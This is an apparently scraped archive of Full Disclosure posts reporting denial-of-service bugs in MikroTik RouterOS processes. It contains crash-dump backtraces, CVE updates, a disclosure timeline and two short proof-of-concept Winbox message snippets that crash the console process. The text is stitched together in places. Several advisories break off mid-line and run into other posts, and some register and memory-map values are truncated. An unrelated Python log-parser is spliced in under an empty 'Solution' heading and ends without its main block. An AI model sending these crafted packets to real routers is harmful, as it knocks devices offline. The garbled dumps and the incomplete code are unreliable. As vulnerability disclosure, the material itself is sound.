Q C wrote on Tue, Jul 7, 2020 at 10:05 PM:

> Advisory: four vulnerabilities found in MikroTik's RouterOS
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through stable 6.47
> Fixed Versions: stable 6.47
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point.
>
> Description of vulnerabilities
> ==
>
> These four vulnerabilities were tested only against the MikroTik RouterOS stable release tree when found.
> Maybe other release trees also suffer from these vulnerabilities.
>
> PS: The following three memory corruption vulnerabilities are different.
>
> 1. NULL pointer dereference vulnerability
> The lcdstat process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the lcdstat process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: /nova/bin/lcdstat
> 2020.06.04-15:32:04.67@0: --- signal=11
>
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202
> 2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc ebp=0x7fbeae18 esp=0x7fbeadf4
> 2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848 ecx=0x0807f14c edx=0x0001
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: maps:
> 2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp 00:0c 1054 /nova/bin/lcdstat
> 2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.04-15:32:04.67@0: 77736000-7775 r-xp 00:0c 960 /lib/libgcc_s.so.1
> 2020.06.04-15:32:04.67@0: 77751000-7776 r-xp 00:0c 944 /lib/libuc++.so
> 2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp 00:0c 950 /lib/libubox.so
> 2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp 00:0c 946 /lib/libumsg.so
> 2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4
> 2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 07 08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f
> 2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8 be 7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f
> 2020.06.04-15:32:04.67@0:
> 2020.06.04-15:32:04.67@0: code: 0x805a26e
> 2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 83 c4
>
> 2. NULL pointer dereference vulnerability
> The lcdstat process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the lcdstat process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: /nova/bin/lcdstat
> 2020.06.04-15:48:13.77@0: --- signal=11
>
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246
> 2020.06.04-15:48:13.77@0: edi=0xff00 esi=0x00ff ebp=0x7fd8cb48 esp=0x7fd8cb2c
> 2020.06.04-15:48:13.77@0: eax=0x ebx=0x ecx=0x edx=0x
> 2020.06.04-15:48:13.77@0:
> 2020.06.04-15:48:13.77@0: maps:
> 2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp 00:0c 1054 /nova/bin/lcdstat
> 2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/resolver process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access.

CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /nova/bin/user process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.

Q C wrote on Wed, Sep 9, 2020 at 9:02 PM:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point.
>
> Description of vulnerabilities
> ==
>
> 1. memory corruption
> The resolver process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the resolver process due to invalid memory access.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.28@0: /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: --- signal=11
>
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
> 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08 esp=0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00 edx=0x0005
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: maps:
> 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 /lib/libgcc_s.so.1
> 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 /lib/libuc++.so
> 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 /lib/libubox.so
> 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 /lib/libumsg.so
> 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
> 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: code: 0x80508f6
> 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47.
>
> 2. reachable assertion failure
> The user process suffers from an assertion failure vulnerability. There is a reachable assertion in the user process. By sending a crafted packet, an authenticated remote user can crash the user process due to assertion failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: /nova/bin/user
> 2020.06.04-17:56:52.31@0: --- signal=6
>
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
> 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790 esp=0x7fee3788
> 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4 edx=0x0006
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: maps:
> 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 /nova/bin/user
> 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 /lib/libgcc_s.so.1
> 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 /lib/libuc++.so
> 2020.06.04-17:56:52.31@0: 7769-776ad000 r
Re: [FD] Three vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Three CVEs have been assigned to these vulnerabilities.

CVE-2020-20266: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/dot1x process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2020-20264: Mikrotik RouterOs before 6.47 (stable tree) suffers from a vulnerability in the /ram/pckg/advanced-tools/nova/bin/netwatch process. An authenticated remote attacker can cause a Denial of Service due to a divide by zero error.

CVE-2020-20265: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /ram/pckg/wireless/nova/bin/wireless process. An authenticated remote attacker can cause a Denial of Service via a crafted packet.

Q C wrote on Thu, Aug 27, 2020 at 7:16 PM:

> Advisory: three vulnerabilities found in MikroTik's RouterOS
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point.
>
> Description of vulnerabilities
> ==
>
> 1. NULL pointer dereference
> The dot1x process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the dot1x process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-14:51:29.47@0:
> 2020.06.04-14:51:29.47@0:
> 2020.06.04-14:51:29.81@0: /nova/bin/dot1x
> 2020.06.04-14:51:29.81@0: --- signal=11
>
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202
> 2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0 ebp=0x7fc50f78 esp=0x7fc50f6c
> 2020.06.04-14:51:29.81@0: eax=0x ebx=0x776ad4ec ecx=0x edx=0x08062e28
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: maps:
> 2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp 00:0c 1064 /nova/bin/dot1x
> 2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
> 2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp 00:0c 960 /lib/libgcc_s.so.1
> 2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp 00:0c 944 /lib/libuc++.so
> 2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp 00:0c 951 /lib/liburadius.so
> 2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so
> 2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp 00:0c 947 /lib/libucrypto.so
> 2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp 00:0c 946 /lib/libumsg.so
> 2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c
> 2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f c5 7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08
> 2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00 00 00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: code: 0x776a51e5
> 2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08 e8
>
> This vulnerability was initially found in stable 6.46.3, and was fixed in stable 6.47.
>
> 2. division by zero
> The netwatch process suffers from a division-by-zero vulnerability. By sending a crafted packet, an authenticated remote user can crash the netwatch process due to arithmetic exception.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.04-16:25:57.65@0: --- signal=8
>
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246
> 2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x ebp=0x73f8 esp=0x73b0
> 2020.06.04-16:25:57.65@0: eax=0x ebx=0x08051020 ecx=0x edx=0x
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: maps:
> 2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp 00:1a 14 /ra
Re: [FD] Three vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Three CVEs have been assigned to these vulnerabilities.

CVE-2020-20215: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/diskd process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access.

CVE-2020-20216: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/graphing process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2020-20213: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a stack exhaustion vulnerability in the /nova/bin/net process. An authenticated remote attacker can cause a Denial of Service due to overloading the system's CPU.

Q C wrote on Wed, 22 Jul 2020 at 8:11 PM:
> Advisory: three vulnerabilities found in MikroTik's RouterOS
> [...]
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/igmp-proxy process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.

Q C wrote on Thu, 13 Aug 2020 at 7:14 PM:
> Advisory: two vulnerabilities found in MikroTik's RouterOS
> [...]
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/cerm process. An authenticated remote attacker can cause a Denial of Service due to overloading the system's CPU.

CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/traceroute process. An authenticated remote attacker can cause a Denial of Service via the loop counter variable.

Q C wrote on Sun, 10 May 2020 at 10:41 AM:
> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: until stable 6.45.7 (first vulnerability), until stable 6.46.4 (second vulnerability)
> Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second vulnerability)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ===
>
> RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.
>
>
> Description of vulnerabilities
> ===
>
> These two vulnerabilities were tested only against the MikroTik RouterOS stable release tree when found. Maybe other release trees also suffer from these vulnerabilities.
>
> 1. The cerm process suffers from an uncontrolled resource consumption issue. By sending a crafted packet, an authenticated remote user can cause a high CPU load, which may make the device respond slowly or be unable to respond.
>
> 2. The traceroute process suffers from a memory corruption issue. By sending a crafted packet, an authenticated remote user can crash the traceroute process due to invalid memory access.
>
>
> Solution
> ===
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ===
>
> [1] https://mikrotik.com/download/changelogs/stable-release-tree
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been assigned to these two vulnerabilities.

CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an assertion failure vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet.

Q C wrote on Tue, 14 Apr 2020 at 6:29 PM:
> [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers from these two vulnerabilities.
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through 6.46.5 (stable release tree)
> Fixed Versions: -
> Vendor URL: https://mikrotik.com/
> Vendor Status: not fixed yet
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Poc
> ===
> The following pocs are based on the tool routeros (https://github.com/tenable/routeros)
>
> 1) memory corruption in console process
>
>     WinboxMessage msg;
>     msg.set_to(48, 4);
>     msg.set_command(0xfe0005);
>     msg.add_u32(0xfe000c, -1);
>     msg.add_u32(9, 9);
>
> 2) assertion failure in console process
>
>     WinboxMessage msg;
>     msg.set_to(48, 4);
>     msg.set_command(0xfe0005);
>     msg.add_u32(0xfe0001, 0);
>
> Disclosure timeline
> ===
> 2019/08/23  reported the 2nd issue to the vendor
> 2019/08/26  reported the 1st issue to the vendor
> 2019/08/28  vendor reproduced the 1st issue and will fix it as soon as possible
> 2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as possible
> 2019/12/02  notified the vendor that the 1st issue still exists in version 6.44.6 (2nd issue fixed)
> 2020/01/06  no response from the vendor, and did the initial disclosure
> 2020/04/14  re-tested these two issues against the stable 6.46.5, and updated the disclosure
>
>
> Q C wrote on Mon, 6 Jan 2020 at 7:32 PM:
>>
>> Advisory: two vulnerabilities found in MikroTik's RouterOS
>>
>>
>> Details
>> ===
>>
>> Product: MikroTik's RouterOS
>> Affected Versions: before 6.44.6 (Long-term release tree)
>> Fixed Versions: 6.44.6 (Long-term release tree)
>> Vendor URL: https://mikrotik.com/
>> Vendor Status: fixed version released
>> CVE: -
>> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>>
>>
>> Product Description
>> ===
>>
>> RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.
>>
>>
>> Description of vulnerabilities
>> ===
>>
>> These two vulnerabilities were tested only against the MikroTik RouterOS long-term release tree when found. Maybe other release trees also suffer from these issues.
>>
>> 1. The console process suffers from a memory corruption issue. An authenticated remote user can crash the console process due to a NULL pointer dereference by sending a crafted packet.
>>
>> 2. The console process suffers from an assertion failure issue. There is a reachable assertion in the console process. An authenticated remote user can crash the console process due to assertion failure by sending a crafted packet.
>>
>> Solution
>> ===
>>
>> Upgrade to the corresponding latest RouterOS tree version.
>>
>>
>> References
>> ===
>>
>> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>>
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
===

RouterOS is the operating system used on MikroTik's devices, such as switches, routers and access points.


Description of vulnerabilities
===

1. memory corruption
The resolver process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the resolver process due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08 esp=0x7fe5fcc0
2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00 edx=0x0005
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 /lib/libubox.so
2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: code: 0x80508f6
2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b

This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47.

2. reachable assertion failure
The user process suffers from an assertion failure vulnerability. There is a reachable assertion in the user process. By sending a crafted packet, an authenticated remote user can crash the user process due to assertion failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790 esp=0x7fee3788
2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4 edx=0x0006
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 /nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp 00:0c 947 /lib/libucrypto.so
2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00:0c 951 /lib/liburadius.so
2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so
2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp 00:0c 948 /lib/libuxml++.so
2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788
2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65 77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00
2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70 77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: code: 0x7765a55b
2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8

This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47.

Solution
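A triage parser for the backtrace.log format quoted in these advisories, added here as an example; it is not code from the advisories, from the author, or from MikroTik. It assumes only the dump layout shown above (timestamp-prefixed lines, a "--- signal=N" line, register lines and a maps section), treats truncated map ranges such as "7768-7768f000" as untrusted, and runs on constructed samples modelled on the user and resolver dumps.

```python
"""Triage helper for the RouterOS /rw/logs/backtrace.log records quoted above.
Added example, not code from the advisories or from MikroTik; it assumes only the
dump layout shown above and uses constructed samples modelled on those dumps."""
import re
from dataclasses import dataclass, field
from typing import Optional

SIGNAL_NAMES = {
    6: "SIGABRT (abort / reachable assertion)",
    8: "SIGFPE (arithmetic exception, e.g. division by zero)",
    11: "SIGSEGV (invalid memory access / NULL pointer dereference)",
}
# Every dump line carries a "YYYY.MM.DD-HH:MM:SS.ff@cpu: " prefix; strip it.
_PREFIX = re.compile(r"^\d{4}\.\d{2}\.\d{2}-\d{2}:\d{2}:\d{2}\.\d{2}@\d+:\s?")
# A trustworthy maps line has two full 8-digit addresses; the scraped dumps also
# contain truncated ones ("7768-7768f000") that must not be used for lookups.
_MAP = re.compile(r"^([0-9a-f]{8})-([0-9a-f]{8})\s+\S+\s+\S+\s+\d+\s+(\S+)$")
_MAP_LIKE = re.compile(r"^[0-9a-f]+-[0-9a-f]+\s")
_REG = re.compile(r"\b(eip|eax|ebx|ecx|edx|esi|edi|ebp|esp)=0x([0-9a-f]*)")

@dataclass
class Crash:
    process: str = ""
    signal: Optional[int] = None
    regs: dict = field(default_factory=dict)          # name -> int or None
    maps: list = field(default_factory=list)          # (start, end, path)
    skipped_maps: list = field(default_factory=list)  # damaged lines, ignored

    def signal_name(self) -> str:
        return SIGNAL_NAMES.get(self.signal, f"signal {self.signal}")

    def locate(self, addr: int):
        """Return (path, offset) of the mapping containing addr, else None."""
        for start, end, path in self.maps:
            if start <= addr < end:
                return path, addr - start
        return None

def parse_backtrace(text: str) -> Crash:
    crash = Crash()
    for raw in text.splitlines():
        line = _PREFIX.sub("", raw).strip()
        if not line or line.startswith("#"):
            continue  # blank line or the 'cat' command itself
        if line.startswith("--- signal="):
            crash.signal = int(line.split("=", 1)[1])
        elif line.startswith("/") and not crash.process:
            crash.process = line  # first absolute path is the crashed binary
        elif "=0x" in line:
            for name, val in _REG.findall(line):
                # scraped dumps sometimes lose the digits ("eax=0x"): store None
                crash.regs[name] = int(val, 16) if val else None
        elif _MAP_LIKE.match(line):
            m = _MAP.match(line)
            if m:
                crash.maps.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3)))
            else:
                crash.skipped_maps.append(line)
    return crash

def triage(text: str) -> dict:
    """One-record summary: which binary, which signal, and where eip landed."""
    c = parse_backtrace(text)
    eip = c.regs.get("eip")
    where = c.locate(eip) if eip is not None else None
    return {
        "process": c.process,
        "signal": c.signal_name(),
        "eip": eip,
        "module": where[0] if where else None,
        "offset": where[1] if where else None,
        # eip in libc on SIGABRT is abort() from a failed assertion; eip inside
        # the service binary on SIGSEGV points at that binary's own bug.
        "in_service_binary": bool(where) and where[0] == c.process,
    }

# Constructed samples modelled on the user and resolver dumps quoted above.
USER_DUMP = """\
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4 edx=0x0006
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 /nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 /lib/libuc++.so
"""
RESOLVER_DUMP = """\
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
"""

if __name__ == "__main__":
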